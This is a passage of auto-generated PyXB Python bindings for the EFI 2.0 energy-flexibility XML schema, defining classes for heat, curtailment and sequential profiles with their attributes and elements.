_ElementMap.update({
__element.name() : __element
})
_AttributeMap.update({
})
_module_typeBindings.HeatProfile = HeatProfile
Namespace.addCategoryObject('typeBinding', 'HeatProfile', HeatProfile)
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_4 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 192, 4)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
__duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_4_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
__duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 193, 5)
__duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 193, 5)
duration = property(__duration.value, __duration.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}temperature uses Python identifier temperature
__temperature = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'temperature'), 'temperature', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_4_httpwww_flexiblepower_orgefi_2temperature', pyxb.binding.datatypes.double)
__temperature._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 194, 5)
__temperature._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 194, 5)
temperature = property(__temperature.value, __temperature.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}flowRate uses Python identifier flowRate
__flowRate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'flowRate'), 'flowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_4_httpwww_flexiblepower_orgefi_2flowRate', pyxb.binding.datatypes.double)
__flowRate._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 195, 5)
__flowRate._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 195, 5)
flowRate = property(__flowRate.value, __flowRate.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}thermalPower uses Python identifier thermalPower
__thermalPower = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'thermalPower'), 'thermalPower', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_4_httpwww_flexiblepower_orgefi_2thermalPower', pyxb.binding.datatypes.double)
__thermalPower._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 196, 5)
__thermalPower._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 196, 5)
thermalPower = property(__thermalPower.value, __thermalPower.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__duration.name() : __duration,
__temperature.name() : __temperature,
__flowRate.name() : __flowRate,
__thermalPower.name() : __thermalPower
})
_module_typeBindings.CTD_ANON_4 = CTD_ANON_4
# Complex type {http://www.flexiblepower.org/efi-2}HeatProbabilityProfile with content type ELEMENT_ONLY
class HeatProbabilityProfile (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}HeatProbabilityProfile with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'HeatProbabilityProfile')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 201, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}element uses Python identifier element
__element = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'element'), 'element', '__httpwww_flexiblepower_orgefi_2_HeatProbabilityProfile_httpwww_flexiblepower_orgefi_2element', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 203, 3), )
element = property(__element.value, __element.set, None, None)
_ElementMap.update({
__element.name() : __element
})
_AttributeMap.update({
})
_module_typeBindings.HeatProbabilityProfile = HeatProbabilityProfile
Namespace.addCategoryObject('typeBinding', 'HeatProbabilityProfile', HeatProbabilityProfile)
# Complex type [anonymous] with content type ELEMENT_ONLY
class CTD_ANON_5 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 204, 4)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}temperature uses Python identifier temperature
__temperature = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'temperature'), 'temperature', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_5_httpwww_flexiblepower_orgefi_2temperature', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 206, 6), )
temperature = property(__temperature.value, __temperature.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}flowRate uses Python identifier flowRate
__flowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'flowRate'), 'flowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_5_httpwww_flexiblepower_orgefi_2flowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 207, 6), )
flowRate = property(__flowRate.value, __flowRate.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}thermalPower uses Python identifier thermalPower
__thermalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'thermalPower'), 'thermalPower', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_5_httpwww_flexiblepower_orgefi_2thermalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 208, 6), )
thermalPower = property(__thermalPower.value, __thermalPower.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
__duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_5_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
__duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 210, 5)
__duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 210, 5)
duration = property(__duration.value, __duration.set, None, None)
_ElementMap.update({
__temperature.name() : __temperature,
__flowRate.name() : __flowRate,
__thermalPower.name() : __thermalPower
})
_AttributeMap.update({
__duration.name() : __duration
})
_module_typeBindings.CTD_ANON_5 = CTD_ANON_5
# Complex type {http://www.flexiblepower.org/efi-2}SupportedCommodities with content type ELEMENT_ONLY
class SupportedCommodities (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}SupportedCommodities with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SupportedCommodities')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 226, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}commodityType uses Python identifier commodityType
__commodityType = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'commodityType'), 'commodityType', '__httpwww_flexiblepower_orgefi_2_SupportedCommodities_httpwww_flexiblepower_orgefi_2commodityType', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 228, 3), )
commodityType = property(__commodityType.value, __commodityType.set, None, None)
_ElementMap.update({
__commodityType.name() : __commodityType
})
_AttributeMap.update({
})
_module_typeBindings.SupportedCommodities = SupportedCommodities
Namespace.addCategoryObject('typeBinding', 'SupportedCommodities', SupportedCommodities)
# Complex type {http://www.flexiblepower.org/efi-2}CurtailmentOptions with content type ELEMENT_ONLY
class CurtailmentOptions (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}CurtailmentOptions with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurtailmentOptions')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 231, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}curtailmentOption uses Python identifier curtailmentOption
__curtailmentOption = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'curtailmentOption'), 'curtailmentOption', '__httpwww_flexiblepower_orgefi_2_CurtailmentOptions_httpwww_flexiblepower_orgefi_2curtailmentOption', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 233, 3), )
curtailmentOption = property(__curtailmentOption.value, __curtailmentOption.set, None, None)
_ElementMap.update({
__curtailmentOption.name() : __curtailmentOption
})
_AttributeMap.update({
})
_module_typeBindings.CurtailmentOptions = CurtailmentOptions
Namespace.addCategoryObject('typeBinding', 'CurtailmentOptions', CurtailmentOptions)
# Complex type {http://www.flexiblepower.org/efi-2}CurtailmentRange with content type EMPTY
class CurtailmentRange (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}CurtailmentRange with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurtailmentRange')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 243, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}lowerBound uses Python identifier lowerBound
__lowerBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'lowerBound'), 'lowerBound', '__httpwww_flexiblepower_orgefi_2_CurtailmentRange_httpwww_flexiblepower_orgefi_2lowerBound', pyxb.binding.datatypes.double, required=True)
__lowerBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 244, 2)
__lowerBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 244, 2)
lowerBound = property(__lowerBound.value, __lowerBound.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}upperBound uses Python identifier upperBound
__upperBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'upperBound'), 'upperBound', '__httpwww_flexiblepower_orgefi_2_CurtailmentRange_httpwww_flexiblepower_orgefi_2upperBound', pyxb.binding.datatypes.double, required=True)
__upperBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 245, 2)
__upperBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 245, 2)
upperBound = property(__upperBound.value, __upperBound.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__lowerBound.name() : __lowerBound,
__upperBound.name() : __upperBound
})
_module_typeBindings.CurtailmentRange = CurtailmentRange
Namespace.addCategoryObject('typeBinding', 'CurtailmentRange', CurtailmentRange)
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_6 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 259, 7)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}power uses Python identifier power
__power = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'power'), 'power', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_6_httpwww_flexiblepower_orgefi_2power', pyxb.binding.datatypes.double, required=True)
__power._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 260, 8)
__power._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 260, 8)
power = property(__power.value, __power.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__power.name() : __power
})
_module_typeBindings.CTD_ANON_6 = CTD_ANON_6
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_7 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 264, 7)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}flowRate uses Python identifier flowRate
__flowRate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'flowRate'), 'flowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_7_httpwww_flexiblepower_orgefi_2flowRate', pyxb.binding.datatypes.double, required=True)
__flowRate._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 265, 8)
__flowRate._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 265, 8)
flowRate = property(__flowRate.value, __flowRate.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__flowRate.name() : __flowRate
})
_module_typeBindings.CTD_ANON_7 = CTD_ANON_7
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_8 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 269, 7)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}temperature uses Python identifier temperature
__temperature = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'temperature'), 'temperature', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_8_httpwww_flexiblepower_orgefi_2temperature', pyxb.binding.datatypes.double)
__temperature._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 270, 8)
__temperature._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 270, 8)
temperature = property(__temperature.value, __temperature.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}flowRate uses Python identifier flowRate
__flowRate = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'flowRate'), 'flowRate', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_8_httpwww_flexiblepower_orgefi_2flowRate', pyxb.binding.datatypes.double)
__flowRate._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 271, 8)
__flowRate._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 271, 8)
flowRate = property(__flowRate.value, __flowRate.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}thermalPower uses Python identifier thermalPower
__thermalPower = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'thermalPower'), 'thermalPower', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_8_httpwww_flexiblepower_orgefi_2thermalPower', pyxb.binding.datatypes.double)
__thermalPower._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 272, 8)
__thermalPower._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 272, 8)
thermalPower = property(__thermalPower.value, __thermalPower.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__temperature.name() : __temperature,
__flowRate.name() : __flowRate,
__thermalPower.name() : __thermalPower
})
_module_typeBindings.CTD_ANON_8 = CTD_ANON_8
# Complex type {http://www.flexiblepower.org/efi-2}ProfileContainer with content type ELEMENT_ONLY
class ProfileContainer (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}ProfileContainer with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'ProfileContainer')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 291, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}electricityProfile uses Python identifier electricityProfile
__electricityProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricityProfile'), 'electricityProfile', '__httpwww_flexiblepower_orgefi_2_ProfileContainer_httpwww_flexiblepower_orgefi_2electricityProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 294, 4), )
electricityProfile = property(__electricityProfile.value, __electricityProfile.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}electricityProbabilityProfile uses Python identifier electricityProbabilityProfile
__electricityProbabilityProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricityProbabilityProfile'), 'electricityProbabilityProfile', '__httpwww_flexiblepower_orgefi_2_ProfileContainer_httpwww_flexiblepower_orgefi_2electricityProbabilityProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 295, 4), )
electricityProbabilityProfile = property(__electricityProbabilityProfile.value, __electricityProbabilityProfile.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}gasProfile uses Python identifier gasProfile
__gasProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasProfile'), 'gasProfile', '__httpwww_flexiblepower_orgefi_2_ProfileContainer_httpwww_flexiblepower_orgefi_2gasProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 298, 4), )
gasProfile = property(__gasProfile.value, __gasProfile.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}gasProbabilityProfile uses Python identifier gasProbabilityProfile
__gasProbabilityProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasProbabilityProfile'), 'gasProbabilityProfile', '__httpwww_flexiblepower_orgefi_2_ProfileContainer_httpwww_flexiblepower_orgefi_2gasProbabilityProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 299, 4), )
gasProbabilityProfile = property(__gasProbabilityProfile.value, __gasProbabilityProfile.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatProfile uses Python identifier heatProfile
__heatProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatProfile'), 'heatProfile', '__httpwww_flexiblepower_orgefi_2_ProfileContainer_httpwww_flexiblepower_orgefi_2heatProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 302, 4), )
heatProfile = property(__heatProfile.value, __heatProfile.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatProbabilityProfile uses Python identifier heatProbabilityProfile
__heatProbabilityProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatProbabilityProfile'), 'heatProbabilityProfile', '__httpwww_flexiblepower_orgefi_2_ProfileContainer_httpwww_flexiblepower_orgefi_2heatProbabilityProfile', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 303, 4), )
heatProbabilityProfile = property(__heatProbabilityProfile.value, __heatProbabilityProfile.set, None, None)
_ElementMap.update({
__electricityProfile.name() : __electricityProfile,
__electricityProbabilityProfile.name() : __electricityProbabilityProfile,
__gasProfile.name() : __gasProfile,
__gasProbabilityProfile.name() : __gasProbabilityProfile,
__heatProfile.name() : __heatProfile,
__heatProbabilityProfile.name() : __heatProbabilityProfile
})
_AttributeMap.update({
})
_module_typeBindings.ProfileContainer = ProfileContainer
Namespace.addCategoryObject('typeBinding', 'ProfileContainer', ProfileContainer)
# Complex type {http://www.flexiblepower.org/efi-2}CurtailmentProfileElement with content type EMPTY
class CurtailmentProfileElement (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}CurtailmentProfileElement with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurtailmentProfileElement')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 336, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
__duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_CurtailmentProfileElement_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
__duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 337, 2)
__duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 337, 2)
duration = property(__duration.value, __duration.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}value uses Python identifier value_
__value = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'value'), 'value_', '__httpwww_flexiblepower_orgefi_2_CurtailmentProfileElement_httpwww_flexiblepower_orgefi_2value', pyxb.binding.datatypes.double, required=True)
__value._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 338, 2)
__value._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 338, 2)
value_ = property(__value.value, __value.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__duration.name() : __duration,
__value.name() : __value
})
_module_typeBindings.CurtailmentProfileElement = CurtailmentProfileElement
Namespace.addCategoryObject('typeBinding', 'CurtailmentProfileElement', CurtailmentProfileElement)
# Complex type {http://www.flexiblepower.org/efi-2}SequentialProfile with content type ELEMENT_ONLY
class SequentialProfile (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}SequentialProfile with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SequentialProfile')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 351, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}maxIntervalBefore uses Python identifier maxIntervalBefore
__maxIntervalBefore = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'maxIntervalBefore'), 'maxIntervalBefore', '__httpwww_flexiblepower_orgefi_2_SequentialProfile_httpwww_flexiblepower_orgefi_2maxIntervalBefore', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 353, 3), )
maxIntervalBefore = property(__maxIntervalBefore.value, __maxIntervalBefore.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}sequentialProfileAlternatives uses Python identifier sequentialProfileAlternatives
__sequentialProfileAlternatives = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileAlternatives'), 'sequentialProfileAlternatives', '__httpwww_flexiblepower_orgefi_2_SequentialProfile_httpwww_flexiblepower_orgefi_2sequentialProfileAlternatives', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 354, 3), )
sequentialProfileAlternatives = property(__sequentialProfileAlternatives.value, __sequentialProfileAlternatives.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}sequenceNr uses Python identifier sequenceNr
__sequenceNr = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'sequenceNr'), 'sequenceNr', '__httpwww_flexiblepower_orgefi_2_SequentialProfile_httpwww_flexiblepower_orgefi_2sequenceNr', pyxb.binding.datatypes.int, required=True)
__sequenceNr._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 356, 2)
__sequenceNr._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 356, 2)
sequenceNr = property(__sequenceNr.value, __sequenceNr.set, None, None)
_ElementMap.update({
__maxIntervalBefore.name() : __maxIntervalBefore,
__sequentialProfileAlternatives.name() : __sequentialProfileAlternatives
})
_AttributeMap.update({
__sequenceNr.name() : __sequenceNr
})
_module_typeBindings.SequentialProfile = SequentialProfile
Namespace.addCategoryObject('typeBinding', 'SequentialProfile', SequentialProfile)
# Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileAlternatives with content type ELEMENT_ONLY
class SequentialProfileAlternatives (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileAlternatives with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SequentialProfileAlternatives')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 365, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}sequentialProfileAlternative uses Python identifier sequentialProfileAlternative
__sequentialProfileAlternative = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileAlternative'), 'sequentialProfileAlternative', '__httpwww_flexiblepower_orgefi_2_SequentialProfileAlternatives_httpwww_flexiblepower_orgefi_2sequentialProfileAlternative', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 367, 3), )
sequentialProfileAlternative = property(__sequentialProfileAlternative.value, __sequentialProfileAlternative.set, None, None)
_ElementMap.update({
__sequentialProfileAlternative.name() : __sequentialProfileAlternative
})
_AttributeMap.update({
})
_module_typeBindings.SequentialProfileAlternatives = SequentialProfileAlternatives
Namespace.addCategoryObject('typeBinding', 'SequentialProfileAlternatives', SequentialProfileAlternatives)
# Complex type {http://www.flexiblepower.org/efi-2}SequentialProfiles with content type ELEMENT_ONLY
class SequentialProfiles (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}SequentialProfiles with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SequentialProfiles')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 370, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}sequentialProfile uses Python identifier sequentialProfile
